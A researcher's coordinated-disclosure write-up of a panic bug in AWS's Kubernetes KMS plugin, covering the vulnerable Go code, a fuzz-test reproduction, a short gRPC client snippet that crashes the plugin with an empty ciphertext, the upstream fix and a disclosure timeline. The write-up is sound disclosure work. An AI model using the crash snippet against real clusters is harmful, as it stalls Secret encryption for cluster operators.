Empty-ciphertext panic in aws-encryption-provider (CVD with AWS)
A two-byte gRPC request crashed AWS's Kubernetes KMS plugin. Coordinated disclosure with AWS VDP; fix merged as aws-encryption-provider#169.
| Severity | Medium (per AWS VDP) |
| Asset | kubernetes-sigs/aws-encryption-provider |
| CVE | None assigned |
TL;DR (for the non-Go-fluent reader)
The plugin that lets Kubernetes encrypt its Secret objects at rest with AWS KMS
could be crashed by anyone who could talk to its local socket. On a healthy
control-plane node that’s only the Kubernetes API server itself — but it also
covers any other process that gained local access to that socket (a sidecar
with the socket mounted, a co-tenant on the control plane, a misconfigured
permission). A single decrypt request containing an empty bytes field hit an
unchecked array read; Go panicked; because nothing on the call path called
recover(), the whole plugin process died. While it restarted, the API server
could not encrypt or decrypt any Secret — operations that touch Secret storage
stalled cluster-wide.
We reported it to AWS via HackerOne. AWS confirmed the issue does not affect their managed services (the conditions to trigger it aren’t present in their managed environment, and architectural safeguards further limit impact), and engaged the upstream maintainers. The fix shipped in the open-source repo as a one-line length guard. Disclosed coordinated with AWS.
What the tool actually is
kubernetes-sigs/aws-encryption-provider
is the Kubernetes KMS plugin AWS publishes for envelope-encrypting Secret
objects against AWS KMS. It runs as a gRPC server on a Unix domain socket on
the control-plane node, speaks the Kubernetes KMS provider
protocol
(both v1 and v2), and proxies Encrypt / Decrypt calls to AWS KMS. kube-apiserver
calls it whenever it writes or reads a Secret.
A single process serves both V1 and V2 APIs on the same grpc.Server
instance — a detail that matters once you start crashing it.
flowchart LR S[etcd]:::n A[kube-apiserver]:::accent P["aws-encryption-provider
gRPC on /var/run/kmsplugin/socket.sock"]:::accent K[AWS KMS]:::n A -- "Encrypt/Decrypt RPC
(unix socket, no auth)" --> P P -- "kms:Encrypt / kms:Decrypt
(IAM-signed)" --> K A <--> S classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3 classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3
The gRPC server has no auth layer of its own. Access is controlled by Unix socket filesystem permissions only.
The bug — V1 path
File: pkg/plugin/plugin.go:179 at the affected commit 4341c70.
func (p *V1Plugin) Decrypt(ctx context.Context, request *pb.DecryptRequest) (*pb.DecryptResponse, error) {
zap.L().Debug("starting decrypt operation")
startTime := time.Now()
if string(request.Cipher[0]) == kmsplugin.StorageVersion { // <-- LINE 179: PANIC if len == 0
request.Cipher = request.Cipher[1:]
}
// ...
}
Encrypt() at line 169 of the same file prepends a storage-version prefix byte
(0x31 / ASCII '1'):
return &pb.EncryptResponse{Cipher: append([]byte(kmsplugin.StorageVersion), result.CiphertextBlob...)}, nil
Decrypt() then expects to strip that prefix. The assumption is that any
ciphertext seen by Decrypt() came from a prior Encrypt() call and is
therefore non-empty. The gRPC layer makes no such guarantee — the Cipher
field is a protobuf bytes value, deserialised to a Go []byte that can be
either nil or []byte{}. Indexing request.Cipher[0] against either of
those crashes the process.
The bug — V2 path
File: pkg/plugin/plugin_v2.go:182.
Structurally the same; idiom is slightly different (a type conversion, not a string compare):
storageVersion := kmsplugin.KMSStorageVersion(request.Ciphertext[0]) // LINE 182 — same panic, V2 path
V1 and V2 are registered on the same grpc.Server instance, so crashing
either one tears down both. We reported them as two separate HackerOne reports
to keep the fix targets crisp; the maintainers patched them together in one
PR.
Why this kills the whole process
A Go panic in a goroutine without a recover() on the call stack terminates
the entire process. The gRPC server dispatches each request to a goroutine
spawned by serveStreams, and nothing in aws-encryption-provider registers a
recovery interceptor. The actual stack trace from the reproducer:
panic: runtime error: index out of range [0] with length 0
sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
k8s.io/kms/apis/v1beta1._KeyManagementService_Decrypt_Handler
google.golang.org/grpc.(*Server).processUnaryRPC
google.golang.org/grpc.(*Server).handleStream
google.golang.org/grpc.(*Server).serveStreams.func2.1 <- unrecovered goroutine
flowchart TB D["(*V1Plugin).Decrypt
request.Cipher[0]"]:::accent H["_KeyManagementService_Decrypt_Handler
(generated code)"]:::n P["grpc.(*Server).processUnaryRPC"]:::n S["grpc.(*Server).handleStream"]:::n G["grpc.(*Server).serveStreams.func2.1
goroutine — no recover()"]:::alert E["process exits
plugin pod restarts"]:::alert D -- panic --> H --> P --> S --> G --> E classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3 classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3 classDef alert fill:#0A0A0B,stroke:#E8342B,color:#EDEAE3
This is the difference between “a request fails” and “the daemon dies.”
Reproduction
The bug was found by fuzz testing. The harness uses cloud.KMSMock{}, so no
AWS credentials are needed for either method.
Method 1 — direct fuzz harness. Empty []byte{} is registered as seed#0,
which means the panic fires on the very first seed before the fuzzer generates
any new inputs:
git clone https://github.com/kubernetes-sigs/aws-encryption-provider
cd aws-encryption-provider
git checkout 4341c70
go test -fuzz FuzzV1Decrypt -fuzztime 1x ./pkg/plugin/ 2>&1 | tail -20
--- FAIL: FuzzV1Decrypt (0.00s)
--- FAIL: FuzzV1Decrypt/seed#0 (0.00s)
panic: runtime error: index out of range [0] with length 0
sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
.../pkg/plugin/plugin.go:179 +0x7e4
FAIL sigs.k8s.io/aws-encryption-provider/pkg/plugin
Method 2 — live gRPC client over Unix socket. Proves the crash through the full gRPC dispatch path, not just the in-process panic:
conn, _ := grpc.Dial("unix:///var/run/kmsplugin/socket.sock", grpc.WithInsecure())
client := pb.NewKeyManagementServiceClient(conn)
// Crashes the server:
client.Decrypt(context.Background(), &pb.DecryptRequest{Cipher: []byte{}})
The V2 path repro is identical, with v2pb.NewKeyManagementServiceClient and
&v2pb.DecryptRequest{Ciphertext: []byte{}}.
The fix — PR #169
kubernetes-sigs/aws-encryption-provider#169, opened 2026-04-29, merged 2026-04-30. A pure defensive guard. No logic change, no new behaviour. Two parallel five-line additions:
// pkg/plugin/plugin.go (V1)
if len(request.Cipher) == 0 {
return nil, errors.New("invalid empty ciphertext")
}
// pkg/plugin/plugin_v2.go (V2)
if len(request.Ciphertext) == 0 {
return nil, errors.New("invalid empty ciphertext")
}
Plus four new tests — TestDecryptEmptyCipher, TestDecryptNilCipher,
TestDecryptEmptyCiphertextV2, TestDecryptNilCiphertextV2 — each asserting
that the error contains "invalid empty ciphertext" for both the nil and
[]byte{} cases.
AWS’s response, paraphrased: the issue does not impact AWS-managed services or their customers (the component operates in a managed environment where the conditions to trigger this behaviour are not present, and architectural safeguards further limit any potential impact). As an open-source component used by the broader community, AWS engaged the upstream service team to address it.
Calibrated impact
We’re not calling this an RCE and we’re not calling it critical:
- An unrecovered Go panic kills the plugin process. While it restarts,
kube-apiservercannot encrypt new Secrets or decrypt existing ones — operations that touch Secret storage stall. - Trigger requires the ability to send a gRPC
Decryptto the plugin’s local Unix socket. On a healthy control-plane node, that’s the localkube-apiserver. Real-world exposure is limited to scenarios where another local process can reach the socket: misconfigured socket permissions, a sidecar with the socket mounted, or a compromised co-tenant on the control plane. - This is not a remote, unauthenticated, internet-facing bug.
- AWS-managed services not affected (per AWS VDP).
A reliability fix that AWS happily landed upstream, exactly because the behaviour was wrong even though the production exposure was constrained.
Timeline
| Date (UTC) | Event |
|---|---|
| 2026-03-22 | Reported to AWS VDP via HackerOne (#3620748, #3620753) |
| 2026-03-30 | Triaged; severity set Medium (downgraded from initial High 7.5) |
| 2026-04-29 | Upstream PR #169 opened |
| 2026-04-30 | PR #169 merged |
| 2026-05-28 | AWS VDP marked reports Resolved |
| 2026-05-28 | Reports publicly disclosed on HackerOne |
| 2026-05-29 | This writeup published |
Two bytes. Months of CVD. That’s how this work usually goes.
— Syntetisk research (misop00p)